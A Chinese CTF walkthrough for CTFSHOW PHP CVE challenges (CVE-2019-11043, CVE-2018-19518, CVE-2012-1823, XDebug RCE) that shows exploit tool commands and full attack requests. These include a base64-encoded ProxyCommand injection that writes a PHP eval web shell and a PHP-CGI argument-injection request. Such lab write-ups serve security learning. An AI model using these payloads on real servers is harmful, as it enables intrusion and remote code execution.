CTFSHOW php-cve篇

web311

CVE-2019-11043
参考文章
工具下载地址https://github.com/neex/phuip-fpizdam ,需要有go环境
go环境安装地址https://golang.google.cn/dl/
安装的过程很恶心,会timeout。捣鼓了一两个小时才弄好。具体步骤如下

$GOPATH是go安装的目录,记得改成自己的
mkdir -p $GOPATH/src/golang.org/x/
cd $GOPATH/src/golang.org/x/
git clone https://github.com/neex/phuip-fpizdam.git phuip-fpizdam
go install phuip-fpizdam

如果执行完上面的没有问题的话,在go目录的bin下会有phuip-fpizdam可执行文件。接着执行./phuip-fpizdam url/index.php ,像下面这样就是执行成功了。
在这里插入图片描述
然后访问index.php?a=ls就能执行系统命令了。得多试几次,不是每次都成功。

web312

CVE-2018-19518
使用bp发送如下数据包

POST / HTTP/1.1
Host: 75a6df5f-92cc-4495-9958-fef88175eb75.chall.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://XXX:8080/
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Connection: close
Upgrade-Insecure-Requests: 1

hostname=x+-oProxyCommand%3decho%09!!!|base64%09-d|sh}a&username=222&password=333

三个感叹号的位置为要执行命令的base64其他需要改的就是host

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw|base64%09-d|sh}a&username=222&password=333

我的这个是写了一个一句话在e.php中

web313

CVE-2012-1823
poc

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31


web315

XDebug 远程调试漏洞
https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
跑下脚本,脚本在上面的网站里(需要有公网服务器)
python3 exp.py -t url/index.php -c 'shell_exec('id');'

你可能感兴趣的:(CTFSHOW,web入门系列)